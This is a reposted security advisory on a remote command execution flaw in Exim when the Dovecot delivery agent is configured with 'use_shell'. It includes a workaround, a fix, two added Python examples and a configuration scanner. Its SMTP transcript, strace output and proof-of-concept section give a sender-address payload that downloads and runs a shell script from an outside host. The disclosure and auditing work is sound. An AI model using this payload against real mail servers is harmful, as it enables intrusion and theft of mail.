ciulama Posted May 8, 2013

Advisory: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

During a penetration test a typical misconfiguration was found in the way Dovecot is used as a local delivery agent by Exim. A common use case for the Dovecot IMAP and POP3 server is the use of Dovecot as a local delivery agent for Exim. The Dovecot documentation contains an example using a dangerous configuration option for Exim, which leads to a remote command execution vulnerability in Exim.

Details
=======

Product: Exim with Dovecot LDA and Common Example Documentation
Affected Versions: Example Configuration in Dovecot Wiki since 2009-10-23
Vulnerability Type: Remote Code Execution
Security Risk: HIGH
Vendor URL: http://www.exim.org http://www.dovecot.org
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-001
Advisory Status: public

Introduction
============

Dovecot is an open source IMAP and POP3 server. Dovecot is used both for small and large installations because of its good performance and simple administration. Exim is a message transfer agent developed at the University of Cambridge, freely available under the terms of the GNU General Public Licence. Both services are commonly used in tandem with each other. Dovecot is often configured in Exim to handle mail delivery to mailboxes.

The Dovecot wiki contains an example configuration for Exim to have Dovecot handle mail delivery in conjunction with LDAP. Using Dovecot as a local delivery agent (LDA) for Exim is a common use case for an Exim/Dovecot server. The Dovecot wiki, which is also packaged as documentation with the Dovecot source packages and many Linux distribution packages, contains example configurations for Exim. One configuration contains a dangerous option, which leads to a remote command execution vulnerability in Exim.
Since this configuration concerns a very common use case of Dovecot with Exim and is widely repackaged in distribution packages, users of Dovecot and Exim should check their current configuration of Exim.

More Details
============

Dovecot and Exim can be used together without any further configuration of the Exim mail delivery process. This results in a configuration where Dovecot can access mails delivered to a user's mailbox, but message filtering through Dovecot's server-side filters is not possible.

In order for server-side mail filtering by the Sieve implementation of Dovecot to work, Dovecot provides its own local delivery agent (LDA). This agent must be added to the Exim delivery configuration as a mail transport. To make such a configuration work, Exim offers pipe transports[1]. The Exim daemon then hands the email messages over to an external program, in this case the Dovecot LDA (on Debian GNU/Linux found at /usr/lib/dovecot/deliver).

The Dovecot wiki[2] and documentation propose, among others, a configuration for using Exim with the Dovecot LDA and multiple UIDs which are loaded from an external source, for example LDAP. It is assumed that this configuration is often used as a template when configuring new email servers, as coupling SMTP and POP3/IMAP servers with an external user database like LDAP is common. Furthermore, this example configuration is rather detailed. Therefore, it is estimated that many administrators based their configuration on this one.

The example transport configuration from the Dovecot wiki is shown below:

------------------------------------------------------------------------
dovecot_deliver:
  debug_print = "T: Dovecot_deliver for $local_part@$domain"
  driver = pipe
  # Uncomment the following line and comment the one after it if you
  # want deliver to try to deliver subaddresses into INBOX.{subaddress}.
  # If you do this, uncomment the local_part_suffix* lines in the router
  # as well.
  # Make sure you also change the separator to suit your local
  # setup.
  #command = /usr/lib/dovecot/deliver -e -k -s \
  #  -m "INBOX|${substr_1:$local_part_suffix}" \
  command = /usr/lib/dovecot/deliver -e -k -s \
    -f "$sender_address" -a "$original_local_part@$original_domain"
  use_shell
  environment = USER=$local_part@$domain
  umask = 002
  message_prefix =
  message_suffix =
  delivery_date_add
  envelope_to_add
  return_path_add
  log_output
  log_defer_output
  return_fail_output
  freeze_exec_fail
  #temp_errors = *
  temp_errors = 64 : 69 : 70 : 71 : 72 : 73 : 74 : 75 : 78
------------------------------------------------------------------------

With the "use_shell" option, Exim is instructed not to start the program directly, but to expand the whole command string first and hand the result to a shell (/bin/sh -c), which then starts the LDA. Without "use_shell", Exim itself splits the command into separate arguments and expands each argument on its own, so the expanded value of a variable always stays a single argument and is never interpreted as shell syntax[1]. The content of the variable $sender_address (the envelope sender given in MAIL FROM) can in most standard setups be controlled by an attacker, and its value is inserted verbatim into the string which is supplied to the shell. This enables attackers to execute arbitrary shell commands as the Exim system user.

The following conversation with the mail server demonstrates downloading and executing a shell script. Since spaces are not accepted within a sender email address, ${IFS} (the shell's field separator variable, whose default value is whitespace) can be used instead.

------------------------------------------------------------------------
220 host ESMTP Exim 4.72 Mon, 22 Apr 2013 13:22:23 +0200
EHLO example.com
250-host Hello localhost [127.0.0.1]
250-SIZE 52428800
250-PIPELINING
250 HELP
MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
250 OK
RCPT TO: someuser@example.com
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Subject: test

.
250 OK id=1UUEqF-0004P8-2B
------------------------------------------------------------------------

Attaching strace to the Exim process (following child processes) during this example conversation results in the following output:

------------------------------------------------------------------------
# strace -p $(pgrep exim4) -s100 -f -q -e execve
[pid 16962] execve("/usr/sbin/exim4", ["/usr/sbin/exim4", "-Mc", "1UUEwf-0004PZ-9n"], [/* 26 vars */]) = 0
[pid 16964] execve("/bin/sh", ["/bin/sh", "-c", "/usr/lib/dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${I"...], [/* 14 vars */]) = 0
[pid 16966] execve("/usr/bin/wget", ["wget", "-O", "/tmp/p", "example.com/test.sh"], [/* 14 vars */]) = 0
[pid 16964] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 16967] execve("/bin/bash", ["bash", "/tmp/p"], [/* 14 vars */]) = 0
[pid 16964] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 16968] execve("/usr/lib/dovecot/deliver", ["/usr/lib/dovecot/deliver", "-e", "-k", "-s", "-f", "redteam@example.com", "-a", "someuser@example.com"], [/* 14 vars */]) = 0
------------------------------------------------------------------------

This shows that remote command execution is possible in this configuration. Note that the LDA is finally started with "-f redteam@example.com": the shell replaced the two command substitutions with their (here empty) output, so the message is still delivered normally and the envelope sender seen by the LDA carries no trace of the injected commands.

In order to reproduce this vulnerability it is sufficient to install Exim and Dovecot, then configure the Dovecot LDA as a pipe transport in Exim as described by the Dovecot wiki.

This example configuration was added to the Dovecot wiki in 2009 and is likely to be used in numerous Exim/Dovecot installations[3]. The Dovecot wiki is also contained within the Dovecot source files.
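The difference between the shell invocation in the strace output above and a direct invocation, as an added example that is not part of the advisory or of either project: a small Python model of how Exim builds the argv of a pipe transport command with and without "use_shell". The Dovecot LDA is replaced by /bin/echo (so whatever reaches the LDA's argv is printed) and the advisory's wget/bash payload by a harmless `echo injected`; the expansion function is a minimal stand-in for Exim's $var expansion that knows only the three variables listed and implements none of Exim's operators. All of these are assumptions of the example.

```python
import re
import shlex
import subprocess

# Constructed sample (not from the advisory's test system): the transport
# command shape from the Dovecot wiki, with /bin/echo standing in for the
# Dovecot LDA so that whatever reaches its argv is printed, and the
# advisory's wget/bash payload replaced by a harmless `echo injected`.
COMMAND = '/bin/echo -f "$sender_address" -a "$original_local_part@$original_domain"'
PAYLOAD = "red`echo${IFS}injected`team@example.com"  # value given in MAIL FROM
VARS = {
    "sender_address": PAYLOAD,
    "original_local_part": "someuser",
    "original_domain": "example.com",
}

_VAR = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def expand(text, variables):
    """Minimal stand-in for Exim's $var / ${var} expansion (no operators).

    As in Exim, the substituted value is not expanded again, so the ${IFS}
    inside the sender address survives verbatim; it only gains meaning if a
    shell later parses the string. Unknown variables expand to "" here;
    real Exim would fail the expansion instead.
    """
    return _VAR.sub(lambda m: variables.get(m.group(1), ""), text)


def pipe_argv(command, variables, use_shell):
    """argv Exim hands to execve() for a pipe transport command.

    use_shell=False (the default): Exim splits the command into words first
    (double quotes group words; shlex approximates Exim's splitting) and
    expands every word separately, so an expanded value stays one argument
    and can never become shell syntax.
    use_shell=True: the whole string is expanded first and the result is
    given to /bin/sh -c, so shell syntax inside a variable value runs.
    """
    if use_shell:
        return ["/bin/sh", "-c", expand(command, variables)]
    return [expand(word, variables) for word in shlex.split(command)]


def deliver(argv):
    """Run the stand-in LDA and return what it printed (its own argv)."""
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout.strip()


def demo():
    """Deliver the same message through both transport variants."""
    return {
        "use_shell": deliver(pipe_argv(COMMAND, VARS, use_shell=True)),
        "no_shell": deliver(pipe_argv(COMMAND, VARS, use_shell=False)),
    }


if __name__ == "__main__":
    for mode, seen_by_lda in demo().items():
        print(f"{mode:9s} LDA argv: {seen_by_lda}")
```

With "use_shell" the stand-in LDA receives "-f redinjectedteam@example.com", i.e. the command substitution ran and its output was spliced into the address, exactly as the real LDA received "redteam@example.com" above; without it the LDA receives the backtick string as one literal argument.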
The dangerous configuration suggesting the "use_shell" option is contained in the file doc/wiki/LDA.Exim.txt.

An example of the widespread use of this configuration example is the Debian package "dovecot-common", where this example configuration is found in the file /usr/share/doc/dovecot-common/wiki/LDA.Exim.txt.gz[4]. While the redistribution in Debian was verified, it is very likely that other distributions also contain this vulnerable configuration example.

Proof of Concept
================

Sender address which tricks the mail server into downloading and executing a shell script on delivery:

------------------------------------------------------------------------
red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
------------------------------------------------------------------------

Workaround
==========

Users who use Exim in tandem with the Dovecot LDA should check their Exim transport configuration for the "use_shell" option. In the configuration example the "use_shell" option is not necessary and should be removed. The same check applies to any other pipe transport that sets "use_shell" and references variables derived from the SMTP envelope or message headers in its command. Without "use_shell" the mail server starts the LDA directly, as the following strace output during a delivery shows:

------------------------------------------------------------------------
[pid 17485] execve("/usr/sbin/exim4", ["/usr/sbin/exim4", "-Mc", "1UUFGk-0004Y0-Rb"], [/* 14 vars */]) = 0
[pid 17487] execve("/usr/lib/dovecot/deliver", ["/usr/lib/dovecot/deliver", "-e", "-k", "-s", "-f", "red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com", "-a", "someuser@example.com"], [/* 14 vars */]) = 0
------------------------------------------------------------------------

As shown, the sender address string is passed to the LDA as a single argument and is not interpreted by a shell.

Fix
===

Administrators should check their configuration as described under "Workaround".

The dangerous option "use_shell" should be removed from the Dovecot wiki and all the source packages.
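One way to perform the check described under "Workaround" across a whole Exim configuration, as an added example that is neither the advisory's nor either project's code: a Python script that parses the transports section of an Exim configuration, finds pipe transports that set "use_shell", and reports which attacker-influenced expansion variables their command references. The embedded configuration is constructed for the example (the wiki transport as published, a copy with "use_shell" removed, and an unrelated SMTP transport); the list of untrusted variables is an illustrative selection and not exhaustive; and the parser handles a single flat file only, without .include directives.

```python
import re

# Constructed sample configuration (not a real server's): the Dovecot wiki
# transport as published, a copy with use_shell removed, and an unrelated
# transport, so the scan produces exactly one finding.
SAMPLE_CONFIG = r"""
begin transports

dovecot_deliver:
  driver = pipe
  command = /usr/lib/dovecot/deliver -e -k -s \
    -f "$sender_address" -a "$original_local_part@$original_domain"
  use_shell
  environment = USER=$local_part@$domain
  umask = 002
  message_prefix =
  message_suffix =

dovecot_deliver_fixed:
  driver = pipe
  command = /usr/lib/dovecot/deliver -e -k -s \
    -f "$sender_address" -a "$original_local_part@$original_domain"
  umask = 002

remote_smtp:
  driver = smtp

begin retry
"""

# Expansion variables whose values come from the SMTP client (envelope
# sender, recipient, address prefix/suffix). Illustrative, not exhaustive;
# header variables ($h_*, $header_*, ...) are matched separately in audit().
UNTRUSTED_VARS = (
    "sender_address", "sender_address_local_part", "sender_address_domain",
    "local_part", "domain", "original_local_part", "original_domain",
    "local_part_prefix", "local_part_suffix",
)


def parse_transports(config_text):
    """Return {transport: {option: value}} for the 'begin transports' section.

    Handles `option = value`, bare boolean options (`use_shell`,
    `no_use_shell`), comments and backslash continuation lines. If the text
    has no `begin` headers at all (assumed to be the case for the output of
    `exim -bP transports`), all of it is treated as the transports section.
    """
    transports, current = {}, None
    in_section = not re.search(r"^\s*begin\s+\w+", config_text, re.M)
    lines = iter(config_text.splitlines())
    for raw in lines:
        line = raw.rstrip()
        while line.endswith("\\"):                      # join continuation lines
            line = line[:-1].rstrip() + " " + next(lines, "").strip()
        stripped = line.strip()
        section = re.match(r"begin\s+(\w+)", stripped)
        if section:
            in_section, current = section.group(1) == "transports", None
            continue
        if not in_section or not stripped or stripped.startswith("#"):
            continue
        header = re.fullmatch(r"(\w+):", stripped)
        if header:                                      # start of a transport
            current = transports.setdefault(header.group(1), {})
            continue
        if current is None:
            continue
        name, eq, value = (part.strip() for part in stripped.partition("="))
        if eq:
            low = value.lower()
            current[name] = True if low in ("true", "yes") else False if low in ("false", "no") else value
        elif name.startswith(("no_", "not_")):          # negated boolean option
            current[name.split("_", 1)[1]] = False
        else:                                           # bare boolean option
            current[name] = True
    return transports


def audit(transports):
    """Report pipe transports that set use_shell, together with the untrusted
    expansion variables referenced in their command."""
    findings = []
    for name, opts in transports.items():
        if opts.get("driver") != "pipe" or opts.get("use_shell") is not True:
            continue
        command = opts.get("command", "")
        tainted = [v for v in UNTRUSTED_VARS if re.search(r"\$\{?%s\b" % v, command)]
        if re.search(r"\$\{?(b?h|b?header|rh|rheader)_", command):
            tainted.append("header_*")
        findings.append({"transport": name, "tainted": sorted(tainted), "command": command})
    return findings


def scan(config_text):
    return audit(parse_transports(config_text))


if __name__ == "__main__":
    for f in scan(SAMPLE_CONFIG):
        print(f"{f['transport']}: pipe transport with use_shell; untrusted variables in "
              f"command: {', '.join(f['tainted']) or 'none found (still remove use_shell)'}")
```

Any transport reported here should lose its "use_shell" line regardless of which variables are listed, since "use_shell" is what turns an expanded value into shell input; the variable list only shows how directly a remote client reaches the command.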
Also, all distribution packages of Dovecot that contain this example configuration should be changed to prevent users from introducing a remote command execution vulnerability in their Exim/Dovecot installation.

Security Risk
=============

The documentation of a configuration example for a common use case of Dovecot as a local delivery agent for the Exim mail server contains a configuration option which leads to remote command execution. Attackers can execute arbitrary shell commands as the user the Exim mail server runs as. It is estimated that many administrators based their Exim configuration on this example. The resulting vulnerability may be used to establish a foothold on a mail server, read users' mails or expand access rights via a local exploit. Since this configuration example is redistributed with Dovecot packages and describes a common use case for Dovecot and Exim, this configuration is considered to be a high risk.

History
=======

2013-03-05 Vulnerability identified
2013-05-02 Vendor notified
2013-05-02 Vendor confirmed the vulnerability
2013-05-02 Vendor removed the offending line from the Dovecot wiki
2013-05-03 Advisory released

References
==========

[1] http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_pipe_transport.html
[2] http://wiki.dovecot.org/LDA/Exim
[3] http://wiki.dovecot.org/LDA/Exim?action=diff&rev2=12&rev1=11
[4] http://packages.debian.org/search?keywords=dovecot-common

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas.
The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Register court: Aachen HRB 14004
Managing directors: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck

Source: Dovecot with Exim sender_address Parameter - Remote Command Execution